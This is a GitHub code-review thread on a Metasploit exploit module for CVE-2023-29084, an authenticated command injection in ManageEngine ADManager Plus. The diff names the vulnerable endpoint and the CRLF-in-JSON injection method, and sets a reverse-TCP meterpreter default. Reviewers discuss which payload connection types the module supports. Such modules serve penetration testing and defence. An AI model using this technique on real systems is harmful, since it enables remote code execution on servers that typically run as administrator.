modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb

```diff
@@ -0,0 +1,287 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  require 'json'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection',
+        'Description' => %q{
+          ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient
+          validation of user input when performing the ChangePasswordAction function before passing it into a string that is later
+          used as an OS command to execute.
+
+          By making a POST request to /api/json/admin/saveServerSettings with a params POST
+          parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a
+          carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user
+          running ADManager Plus, which will typically be the local administrator.
+
+          Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,
+          so this vulnerability does require authentication to exploit.
+
+          As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads
+          with this exploit, since these will use HTTP connections that will be affected by the change in configuration.
+        },
+        'Author' => [
+          'Simon Humbert', # Disclosure of bug via ZDI
+          'Dinh Hoang', # Aka hnd3884. Writeup and PoC
+          'Grant Willcox', # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-29084'],
+          ['URL', 'https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/'], # Writeup
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'], # ZDI Advisory
+          ['URL', 'https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html'], # Advisory
+          ['URL', 'https://www.manageengine.com/products/ad-manager/release-notes.html'] # Release Notes and Reporter Acknowledgement
+        ],
+        'DisclosureDate' => '2023-04-12',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true,
+        'Payload' => {
+          'BadChars' => "\x22\x0A\x0D\x00[{}]:," # Avoid double quotes, aka 0x22, and some other characters that might cause issues.
+        },
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+            }
```

Comment:
We can use a the Compat and ConnectionType information to filter out HTTP payloads (which are marked as ConnectionType `tunnel` for some reason, I think because they're "tunneled" over HTTP? :man_shrugging:). The following marks the exploit as working with payloads that use no connection or a reverse or bind connection.

```suggestion
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },
              # HTTP payloads don't work reliably because we're configuring the proxy
              'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse bind none' } }
            }
```

Feel free to update the comment. Also the `Type` isn't referenced anywhere so I dropped it.

Reply:
Would be nice to see this more documented. Even trying to navigate the files to understand this, I'm still struggling to understand how this works in places.

That aside, will add this in so we don't have incompatible payloads.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18018/commits/9277f8c89be81af289337b0c59c374e69a9f8d06